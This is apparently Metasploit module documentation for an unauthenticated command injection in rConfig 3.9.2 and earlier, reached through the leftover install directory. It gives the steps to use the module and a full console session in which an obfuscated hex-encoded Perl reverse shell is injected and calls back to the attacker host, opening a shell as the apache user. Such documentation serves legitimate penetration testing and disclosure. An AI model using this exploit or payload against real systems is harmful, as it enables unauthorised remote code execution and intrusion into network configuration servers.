## Description

  This module exploits an unauthenticated command injection vulnerability
  in rConfig versions 3.9.2 and prior. The `install` directory is not
  automatically removed after installation, allowing unauthenticated users
  to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
  as the web server user.


## Vulnerable Software

  This module has been tested successfully on [rConfig](https://rconfig.com/)
  version 3.9.2 on CentOS 7.7.1908 (x64).


## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/unix/webapp/rconfig_install_cmd_exec`
  3. Do: `set rhosts <IP>`
  4. Do: `run`
  5. You should get a new session


## Options

  **TARGETURI**

  The base path to rConfig install directory (default: `/install/`)


## Scenarios

  ```
  msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec 
  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131
  rhosts => 172.16.191.131
  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true
  verbose => true
  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > check

  [*] Executing command: id
  [*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
  [+] 172.16.191.131:443 - The target is vulnerable.
  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > show targets

  Exploit targets:

     Id  Name
     --  ----
     0   Automatic (Unix In-Memory)
     1   Automatic (Linux Dropper)


  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0
  target => 0
  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl
  payload => cmd/unix/reverse_perl
  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 
  lhost => 172.16.191.165
  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [*] Executing command: id
  [*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
  [*] Executing command: /bin/echo -ne '\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64\x64\x72\x2c\x22\x31\x37\x32\x2e\x31\x36\x2e\x31\x39\x31\x2e\x31\x36\x35\x3a\x34\x34\x34\x34\x22\x29\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27'|sh
  [*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.131:35004) at 2019-10-29 11:48:59 -0400

  id
  uid=48(apache) gid=48(apache) groups=48(apache)
  uname -a
  Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
  pwd
  /home/rconfig/www/install/lib/ajaxHandlers
  ^C
  Abort session 1? [y/N]  y
  ""

  [*] 172.16.191.131 - Command shell session 1 closed.  Reason: User exit
  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > 
  ```